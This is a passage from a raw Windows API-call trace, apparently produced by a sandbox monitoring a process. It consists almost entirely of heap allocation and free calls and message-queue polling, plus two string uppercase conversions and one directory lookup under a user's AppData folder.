0x29f71e0 [0176.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0176.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0176.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0176.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0176.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0176.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72718 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0176.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0176.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0176.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0176.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0176.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0176.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0176.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0176.620] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0176.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0176.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0176.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0176.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0176.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0176.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0176.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0176.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0176.622] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0176.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0176.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0176.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0176.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0176.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0176.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0176.623] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0176.623] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0176.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0176.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0176.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0176.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0176.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0176.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0176.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.625] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0176.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0176.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0176.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0176.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0176.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0176.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0176.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0176.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0176.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0176.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0176.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0176.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0176.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0176.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0176.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0176.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0176.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0176.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0176.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0176.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0176.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0176.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Packages", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 0x9e1eb8 [0176.665] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0176.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0176.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0176.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0176.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0176.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0176.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0176.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0176.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0176.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0176.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0176.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0176.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0176.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0176.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0176.668] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0176.668] RtlAllocateHeap 